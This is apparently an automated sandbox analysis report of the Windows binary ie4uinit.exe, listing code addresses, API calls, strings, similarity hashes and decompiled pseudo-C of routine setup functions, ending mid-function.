0x7ff7319dcf34
0x7ff7319dcf42
0x7ff7319dcf46
0x7ff7319dcf50
0x7ff7319dcf57
0x7ff7319dcf6c
0x7ff7319dcf6f
0x7ff7319dcf73
0x7ff7319dcf7c
0x7ff7319dcf7e
0x7ff7319dcf87
0x7ff7319dcf8b
0x7ff7319dcf8d
0x7ff7319dcf95
0x7ff7319dcf97
0x7ff7319dcf99
0x7ff7319dcf9d
0x7ff7319dcfa2
0x7ff7319dcfa6
0x7ff7319dcfae
0x7ff7319dcfb0
0x7ff7319dcfb9
0x7ff7319dcfbd
0x7ff7319dcfbf
0x7ff7319dcfc7
0x7ff7319dcfcd
0x7ff7319dcfd1
0x7ff7319dcfd5
0x7ff7319dcfdd
0x7ff7319dcfe6
0x7ff7319dcfe8
0x7ff7319dcfef
0x7ff7319dcff5
0x7ff7319dcffb
0x7ff7319dd002
0x7ff7319dd004
0x7ff7319dd008
0x7ff7319dd012
0x7ff7319dd020
0x7ff7319dd022
0x7ff7319dd026
0x7ff7319dd030
0x7ff7319dd03e
0x7ff7319dd040
0x7ff7319dd044
0x7ff7319dd04e
0x7ff7319dd050
0x7ff7319dd059
0x7ff7319dd05b
0x7ff7319dd05f
0x7ff7319dd069
0x7ff7319dd074
0x7ff7319dd076
0x7ff7319dd07a
0x7ff7319dd084
0x7ff7319dd086
0x7ff7319dd08f
0x7ff7319dd091
0x7ff7319dd095
0x7ff7319dd09f
0x7ff7319dd0a4
0x7ff7319dd0a6
0x7ff7319dd0aa
0x7ff7319dd0b4
0x7ff7319dd0b9
0x7ff7319dd0bb
0x7ff7319dd0bf
0x7ff7319dd0cd
0x7ff7319dd0dc
0x7ff7319dd0e5
0x7ff7319dd0f3
0x7ff7319dd0f7
0x7ff7319dd0fe
0x7ff7319dd10a
0x7ff7319dd118
0x7ff7319dd123
0x7ff7319dd12d
0x7ff7319dd134
0x7ff7319dd138
0x7ff7319dd13c
0x7ff7319dd143
0x7ff7319dd14a
0x7ff7319dd153
0x7ff7319dd155
0x7ff7319dd159
0x7ff7319dd15c
0x7ff7319dd167
0x7ff7319dd171
0x7ff7319dd178
0x7ff7319dd17c
0x7ff7319dd180
0x7ff7319dd187
0x7ff7319dd18a
0x7ff7319dd191
0x7ff7319dd19a
0x7ff7319dd19e
0x7ff7319dd1a2
0x7ff7319dd1a6
0x7ff7319dd1aa
0x7ff7319dd1bb
0x7ff7319dd1d5

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF7319DCEDA
GetLastError.KERNEL32 ref: 00007FF7319DCEE4
GetLastError.KERNEL32 ref: 00007FF7319DCEF4

Strings

'g, xrefs: 00007FF7319DD118

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileSize
String ID: 'g
API String ID: 3064237074-1221219425
Opcode ID: fc0183ddfc06f209351b9f25150bff5038a636a68cce1115c136ad73e2915022
Instruction ID: 44d11357d700c76ebf03f39df1c88244876a23e97713c815c18d44dfe03dd528
Opcode Fuzzy Hash: fc0183ddfc06f209351b9f25150bff5038a636a68cce1115c136ad73e2915022
Instruction Fuzzy Hash: 62A13272E0C2C2EBE3649F19E58466AF7E0FB44348F904139D75987698CBBDF841AB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D5D60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7319D5D8C
SysFreeString.OLEAUT32 ref: 00007FF7319D5DB8
SysFreeString.OLEAUT32 ref: 00007FF7319D5EE7

Strings

signvalue, xrefs: 00007FF7319D5D85
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D5E66

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$Alloc
String ID: https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP$signvalue
API String ID: 986138563-2343436192
Opcode ID: dba4a3257a411f83e16d9ee2fe00b5a5a04a996c1f5c36b0e1ba40adfbd57730
Instruction ID: 46e8b180f4fea0640343aa9eba8b48dd0e047aa40c75040f39077415e4c59f8f
Opcode Fuzzy Hash: dba4a3257a411f83e16d9ee2fe00b5a5a04a996c1f5c36b0e1ba40adfbd57730
Instruction Fuzzy Hash: 50515836A18B85A2EB14EF11E848328B374FB84B84F558036DB9D07B58CF79E850D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D9F60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7319D9F95

Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C148B

SysStringLen.OLEAUT32 ref: 00007FF7319D9FBD

Part of subcall function 00007FF7319C1440: SysAllocStringLen.OLEAUT32 ref: 00007FF7319C14AB
Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C14BC
Part of subcall function 00007FF7319C1440: memcpy_s.MSVCRT ref: 00007FF7319C14D8
Part of subcall function 00007FF7319C1440: memcpy_s.MSVCRT ref: 00007FF7319C150A
Part of subcall function 00007FF7319C1440: SysFreeString.OLEAUT32 ref: 00007FF7319C1533

SysFreeString.OLEAUT32 ref: 00007FF7319D9FE9
SysFreeString.OLEAUT32 ref: 00007FF7319D9FFC

Strings

bing.com, xrefs: 00007FF7319DA478

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$Allocmemcpy_s
String ID: bing.com
API String ID: 3413315342-724857623
Opcode ID: 4df21d376d5b1f6e8b3e20dac3d6bf2d13ec4efa04ce40dc0dc24df029a2cd91
Instruction ID: 493351b24d758d8baa5cddba70bc44ebcc8dc00cc518bf0b179f2ca0f71cc430
Opcode Fuzzy Hash: 4df21d376d5b1f6e8b3e20dac3d6bf2d13ec4efa04ce40dc0dc24df029a2cd91
Instruction Fuzzy Hash: 8A116F22E08B8292DB10EF56E448029A3A4FB85B84B554031EB8D83B18EE7DD854D750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CCD94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52synchronizationwindowCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?,00000001,00007FF7319CCBA8), ref: 00007FF7319CCDB4
GetLastError.KERNEL32(?,?,00000001,00007FF7319CCBA8), ref: 00007FF7319CCDBD
PostMessageW.USER32 ref: 00007FF7319CCE00
GetLastError.KERNEL32 ref: 00007FF7319CCE0A

Strings

{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}, xrefs: 00007FF7319CCDA6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CreateMessageMutexPost
String ID: {66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}
API String ID: 1064731545-2535197689
Opcode ID: 4017a3f4ecfa0a10bd8e2cdc9bb2fded74f5b7b853e45b618559c013d7d5803b
Instruction ID: 58a59267c8febeb9353fb7cfb6c42d551027e75e26edb7b2c12b1773db922678
Opcode Fuzzy Hash: 4017a3f4ecfa0a10bd8e2cdc9bb2fded74f5b7b853e45b618559c013d7d5803b
Instruction Fuzzy Hash: 08119A21F0C78192E7049B66D444369A7A1FF44F84F848031DA8D47758DF6CD801D730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4408 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

SHGetValueW.SHLWAPI ref: 00007FF7319C4480
SHSetValueW.SHLWAPI ref: 00007FF7319C44BB

Strings

{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF7319C442C
Attributes, xrefs: 00007FF7319C4460, 00007FF7319C44A3
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\%s\ShellFolder, xrefs: 00007FF7319C443D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Value$_vsnwprintf
String ID: Attributes$Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\%s\ShellFolder${871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 2219702684-1335838630
Opcode ID: 15015be8bc8c992df1deb76da336cd0d55baeacf5d82627b624701718af539a2
Instruction ID: 9f8e75ba6eed87996e224e6e0c65ede1e914bebebe5cdc1d9e2dfef19beccdca
Opcode Fuzzy Hash: 15015be8bc8c992df1deb76da336cd0d55baeacf5d82627b624701718af539a2
Instruction Fuzzy Hash: 9B111DB2A1CBC1A6DB109B50F48479AB364FB88758F805122E69D06B98DFBCC104DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C3694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 00007FF7319C36CE
SHGetValueW.SHLWAPI ref: 00007FF7319C3717

Strings

UpgradeInProgress, xrefs: 00007FF7319C36F5
SystemSetupInProgress, xrefs: 00007FF7319C36AC
system\Setup, xrefs: 00007FF7319C36BA, 00007FF7319C3704

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Value
String ID: SystemSetupInProgress$UpgradeInProgress$system\Setup
API String ID: 3702945584-4024946984
Opcode ID: 25aa09b4bff389396c7e737f2b133597983661c616a4b6ef15dfb7e3b1ddaa29
Instruction ID: b4c381fad3151edf9b109cf491b7d4f3e934991044dc4eaa9b5a28ab3810c7c6
Opcode Fuzzy Hash: 25aa09b4bff389396c7e737f2b133597983661c616a4b6ef15dfb7e3b1ddaa29
Instruction Fuzzy Hash: 2A1177B1F0CB81E6DB109F10E4846A5B3A4FB54358F904135D79C02798DFBED948DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C251C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319C251C() {
				signed int _v24;
				void* _v552;
				void* _t11;
				signed long long _t15;
				signed long long _t23;

				_t15 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t15 ^ _t23;
				r8d = 0x104;
				if (GetEnvironmentVariableW(??, ??, ??) != 0) goto 0x319c255b;
				GetLastError();
				goto 0x319c257c;
				r8d = 0x104;
				if (GetEnvironmentVariableW(??, ??, ??) == 0) goto 0x319c2551;
				return E00007FF77FF7319E38D0(1, _t11, _v24 ^ _t23);
			}

0x7ff7319c2523
0x7ff7319c252d
0x7ff7319c2535
0x7ff7319c254f
0x7ff7319c2551
0x7ff7319c2559
0x7ff7319c255b
0x7ff7319c2575
0x7ff7319c2593

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF7319C2547
GetLastError.KERNEL32 ref: 00007FF7319C2551
GetEnvironmentVariableW.KERNEL32 ref: 00007FF7319C256D

Strings

INSTALLER_WINNING_COMPONENT_IDENTITY, xrefs: 00007FF7319C2540
INSTALLER_SHADOWED_COMPONENT_IDENTITY, xrefs: 00007FF7319C2566

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: EnvironmentVariable$ErrorLast
String ID: INSTALLER_SHADOWED_COMPONENT_IDENTITY$INSTALLER_WINNING_COMPONENT_IDENTITY
API String ID: 1936246020-224403506
Opcode ID: c32d00b1ff9a59981e802eb6da6c82e493c4de07fe85d835931ed2be4d7c1337
Instruction ID: 4c3ef822651157111f19436f49703393e00906a26eff760bbcbfe3d5cb4684fe
Opcode Fuzzy Hash: c32d00b1ff9a59981e802eb6da6c82e493c4de07fe85d835931ed2be4d7c1337
Instruction Fuzzy Hash: F7F0FF60F2C5C2A1FB60AB14E8643B9A360FB5874CFC05035C98D865A8DEACE105DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DAF98 Relevance: 7.7, APIs: 5, Instructions: 165
timesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7319DAF98(long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* __rbp;
				void* __r14;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t77;
				signed long long _t105;
				signed long long _t106;
				SYSTEMTIME* _t131;
				signed long long _t132;
				struct _SYSTEMTIME* _t133;
				void* _t138;
				void* _t139;
				void* _t141;
				signed long long _t142;
				void* _t149;
				void* _t150;
				struct _SYSTEMTIME* _t152;
				void* _t154;
				void* _t155;
				void* _t157;
				struct _SYSTEMTIME** _t158;

				_t107 = __rbx;
				 *((long long*)(_t141 + 8)) = __rbx;
				 *((long long*)(_t141 + 0x20)) = __rsi;
				_t3 = _t141 - 0x1f; // -109
				_t139 = _t3;
				_t142 = _t141 - 0xf0;
				_t105 =  *0x319f4658; // 0x8be7dd1f02a
				_t106 = _t105 ^ _t142;
				 *(_t139 + 0xf) = _t106;
				_t158 =  *((intOrPtr*)(_t139 + 0x7f));
				_t6 = _t142 + 0x38; // -22
				r12d = 0;
				_t155 = __rdx;
				 *((intOrPtr*)(_t142 + 0x50)) = r12b;
				r8d = 0x81;
				 *(_t142 + 0x38) = _t152;
				_t9 = _t142 + 0x50; // 0x2
				 *_t158 = _t152;
				if (E00007FF77FF7319DD8A4(_t77, __rbx, __r8, _t9, __rsi, __r8, _t6, _t149, _t150, _t157) < 0) goto 0x319db1db;
				E00007FF77FF7319C1670();
				_t132 = _t106;
				if (_t106 == 0) goto 0x319db070;
				 *(_t106 + 0x420) =  *(_t106 + 0x420) | 0xffffffff;
				 *(_t106 + 0x410) = _t152;
				 *(_t106 + 0x418) = _t152;
				 *(_t106 + 0x428) = _t152;
				 *(_t106 + 0x430) = _t152;
				 *(_t106 + 0x450) = _t152;
				 *((intOrPtr*)(_t106 + 0x458)) = 1;
				 *((intOrPtr*)(_t106 + 0x45d)) = r12b;
				 *_t106 = r12w;
				 *((intOrPtr*)(_t106 + 0x208)) = r12w;
				 *(_t132 + 0x438) = _t106;
				 *(_t132 + 0x440) = _t106;
				 *(_t132 + 0x448) = _t106;
				goto 0x319db073;
				_t133 = _t152;
				if (_t133 != 0) goto 0x319db082;
				goto 0x319db1db;
				_t23 = _t133 + 0x410; // 0x410
				if ( *_t23 == _t152) goto 0x319db093;
				goto 0x319db09d;
				if (E00007FF77FF7319DB558(_t106, _t23) < 0) goto 0x319db1db;
				if (WaitForSingleObject(_t154) == 0) goto 0x319db0c2;
				E00007FF77FF7319DB730(_t44, _t107);
				goto 0x319db0c5;
				if (r12d < 0) goto 0x319db1cb;
				 *((char*)(_t142 + 0x30)) = 1;
				r8d = 0;
				if (E00007FF77FF7319DB414(_t133, _t155) < 0) goto 0x319db1a5;
				if ( *((intOrPtr*)(_t142 + 0x30)) != r12b) goto 0x319db13f;
				GetSystemTime(_t152);
				if (SystemTimeToFileTime(_t131) != 0) goto 0x319db11c;
				E00007FF77FF7319DD1D8();
				goto 0x319db11f;
				if (r12d < 0) goto 0x319db13f;
				_t31 = _t142 + 0x38; // -22
				SetFileTime(??, ??, ??, ??);
				if (WaitForSingleObject(_t138) == 0) goto 0x319db160;
				E00007FF77FF7319DB730(_t51, _t107);
				goto 0x319db163;
				if (r12d < 0) goto 0x319db1a5;
				if (E00007FF77FF7319DB7AC(_t107) < 0) goto 0x319db184;
				_t35 = _t142 + 0x50; // 0x2
				_t54 = E00007FF77FF7319DBB7C(_t53, _t53, _t133, _t35, _t31);
				_t55 = E00007FF77FF7319DB7AC(_t107);
				if (_t55 >= 0) goto 0x319db1bf;
				if (_t54 < 0) goto 0x319db1cb;
				if (_t55 == 0x80070570) goto 0x319db1cb;
				goto 0x319db1bf;
				_t56 = E00007FF77FF7319DB7AC(_t107);
				if (_t56 >= 0) goto 0x319db1bf;
				if (_t55 < 0) goto 0x319db1cb;
				_t75 =  !=  ? _t56 : 0x80070570;
				_t103 =  !=  ? _t56 : 0x80070570;
				if (( !=  ? _t56 : 0x80070570) < 0) goto 0x319db1cb;
				 *_t158 = _t133;
				goto 0x319db1db;
				E00007FF77FF7319DAD28(_t107, _t133, _t133, _t139, _t155);
				E00007FF77FF7319C1698(_t106, _t133);
				return E00007FF77FF7319E38D0(r12d, _t51,  *(_t139 + 0xf) ^ _t142);
			}

0x7ff7319daf98
0x7ff7319daf98
0x7ff7319daf9d
0x7ff7319dafaa
0x7ff7319dafaa
0x7ff7319dafaf
0x7ff7319dafb6
0x7ff7319dafbd
0x7ff7319dafc0
0x7ff7319dafc4
0x7ff7319dafc8
0x7ff7319dafcd
0x7ff7319dafd3
0x7ff7319dafd6
0x7ff7319dafdb
0x7ff7319dafe1
0x7ff7319dafe6
0x7ff7319dafeb
0x7ff7319daff7
0x7ff7319db002
0x7ff7319db007
0x7ff7319db00d
0x7ff7319db00f
0x7ff7319db017
0x7ff7319db01e
0x7ff7319db025
0x7ff7319db02c
0x7ff7319db033
0x7ff7319db03a
0x7ff7319db044
0x7ff7319db04b
0x7ff7319db04f
0x7ff7319db059
0x7ff7319db060
0x7ff7319db067
0x7ff7319db06e
0x7ff7319db070
0x7ff7319db076
0x7ff7319db07d
0x7ff7319db082
0x7ff7319db08c
0x7ff7319db091
0x7ff7319db09f
0x7ff7319db0b5
0x7ff7319db0b9
0x7ff7319db0c0
0x7ff7319db0c7
0x7ff7319db0d2
0x7ff7319db0d7
0x7ff7319db0e9
0x7ff7319db0f4
0x7ff7319db0fb
0x7ff7319db113
0x7ff7319db115
0x7ff7319db11a
0x7ff7319db121
0x7ff7319db12a
0x7ff7319db139
0x7ff7319db153
0x7ff7319db157
0x7ff7319db15e
0x7ff7319db165
0x7ff7319db173
0x7ff7319db175
0x7ff7319db17d
0x7ff7319db18b
0x7ff7319db192
0x7ff7319db196
0x7ff7319db19f
0x7ff7319db1a3
0x7ff7319db1a8
0x7ff7319db1af
0x7ff7319db1b3
0x7ff7319db1bc
0x7ff7319db1bf
0x7ff7319db1c1
0x7ff7319db1c3
0x7ff7319db1c9
0x7ff7319db1ce
0x7ff7319db1d6
0x7ff7319db204

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319DB0AD
GetSystemTime.KERNEL32 ref: 00007FF7319DB0FB
SystemTimeToFileTime.KERNEL32 ref: 00007FF7319DB10B
SetFileTime.KERNEL32 ref: 00007FF7319DB139
WaitForSingleObject.KERNEL32 ref: 00007FF7319DB14B

Part of subcall function 00007FF7319DB7AC: ReleaseMutex.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7B6
Part of subcall function 00007FF7319DB7AC: GetLastError.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7C2
Part of subcall function 00007FF7319DB7AC: GetLastError.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7D4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Time$ErrorFileLastObjectSingleSystemWait$HeapMutexProcessRelease
String ID:
API String ID: 3489531144-0
Opcode ID: add6bde62feadada3e36eda342627bb0098706c843400ebf0e271f96f4639e9f
Instruction ID: 8e02cf9918936877b74946413ce3af9d011b9b986a3cfe697f7591e1c930ac44
Opcode Fuzzy Hash: add6bde62feadada3e36eda342627bb0098706c843400ebf0e271f96f4639e9f
Instruction Fuzzy Hash: 92618F22F08BC2A2E710AB31D88427AA794FF45798F844034DB5F87789DFBDE451A320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D3F18 Relevance: 7.7, APIs: 5, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00007FF77FF7319D3F18(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
				intOrPtr _t69;
				void* _t113;
				intOrPtr* _t115;
				long long _t117;
				long long _t119;
				intOrPtr* _t136;
				void* _t146;
				void* _t149;
				signed long long _t151;
				void* _t155;
				void* _t160;
				void* _t163;
				intOrPtr* _t164;
				void* _t166;

				_t120 = __rbx;
				_t113 = _t155;
				 *((long long*)(_t113 + 8)) = __rbx;
				 *(_t113 + 0x10) = _t151;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				 *((long long*)(_t113 + 0x20)) = __rdi;
				_t149 = __rdx;
				_t146 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x10)) == 0) goto 0x319d3f4a;
				goto 0x319d3f4c;
				if (0 - 1 < 0) goto 0x319d3fe4;
				_t115 =  *((intOrPtr*)(__rcx + 0x10));
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 8)) + _t151 * 8)) + 0x7a0)) != 2) goto 0x319d3f77;
				if ( *((char*)(__rdx + 0x68)) == 0) goto 0x319d3fd8;
				E00007FF77FF7319C1670();
				if (_t115 == 0) goto 0x319d3f93;
				E00007FF77FF7319D80E0(__rbx, _t115);
				_t164 = _t115;
				goto 0x319d3f96;
				r14d = 0;
				if (_t164 == 0) goto 0x319d3fcb;
				if (E00007FF77FF7319D94B4(_t120,  *((intOrPtr*)( *((intOrPtr*)(_t115 + 8)) + _t151 * 8)), _t164, __rdx) < 0) goto 0x319d3fb9;
				E00007FF77FF7319D46A0(_t57, _t120, _t149, _t164);
				_t117 =  *((intOrPtr*)( *_t164 + 0x10));
				 *0x319e7038(_t166, _t163, _t160);
				goto 0x319d3fd0;
				if (0x8007000e < 0) goto 0x319d411b;
				if (_t151 + 1 < 0) goto 0x319d3f5b;
				 *((intOrPtr*)(_t149 + 0x58)) =  *((intOrPtr*)(_t146 + 0x58));
				 *((intOrPtr*)(_t149 + 0x20)) =  *((intOrPtr*)(_t146 + 0x20));
				 *((intOrPtr*)(_t149 + 0x30)) =  *((intOrPtr*)(_t146 + 0x30));
				 *((intOrPtr*)(_t149 + 0x50)) =  *((intOrPtr*)(_t146 + 0x50));
				 *((intOrPtr*)(_t149 + 0x54)) =  *((intOrPtr*)(_t146 + 0x54));
				 *((intOrPtr*)(_t149 + 0x38)) =  *((intOrPtr*)(_t146 + 0x38));
				 *((char*)(_t149 + 0x34)) =  *((intOrPtr*)(_t146 + 0x34));
				 *((intOrPtr*)(_t149 + 0x6c)) =  *((intOrPtr*)(_t146 + 0x6c));
				 *((intOrPtr*)(_t149 + 0x70)) =  *((intOrPtr*)(_t146 + 0x70));
				_t69 =  *((intOrPtr*)(_t146 + 0x24));
				 *((intOrPtr*)(_t149 + 0x24)) = _t69;
				if ( *((long long*)(_t146 + 0x18)) == 0) goto 0x319d4046;
				_t34 = _t149 + 0x18; // 0x18
				 *_t34 =  *_t34 & 0x00000000;
				0x319e4113();
				__imp__SHStrDupW();
				if (_t69 < 0) goto 0x319d411b;
				if ( *((long long*)(_t146 + 0x28)) == 0) goto 0x319d4074;
				_t37 = _t149 + 0x28; // 0x28
				_t122 = _t37;
				 *_t37 =  *_t37 & 0x00000000;
				0x319e4113();
				__imp__SHStrDupW();
				if (_t69 < 0) goto 0x319d411b;
				if ( *((long long*)(_t146 + 0x48)) == 0) goto 0x319d40c5;
				E00007FF77FF7319C1670();
				if (_t117 == 0) goto 0x319d40c0;
				if ( *((intOrPtr*)(_t149 + 0x48)) == 0) goto 0x319d40a1;
				E00007FF77FF7319C1698(_t117,  *((intOrPtr*)(_t149 + 0x48)));
				r9d =  *((intOrPtr*)(_t146 + 0x40));
				__imp__memcpy_s();
				 *((intOrPtr*)(_t149 + 0x40)) =  *((intOrPtr*)(_t146 + 0x40));
				 *((long long*)(_t149 + 0x48)) = _t117;
				goto 0x319d40c5;
				if (0x8007000e < 0) goto 0x319d411b;
				if ( *((long long*)(_t146 + 0x60)) == 0) goto 0x319d411b;
				_t136 =  *((intOrPtr*)(_t149 + 0x60));
				if (_t136 == 0) goto 0x319d40e6;
				_t119 =  *((intOrPtr*)( *_t136 + 0x10));
				 *0x319e7038();
				E00007FF77FF7319C1670();
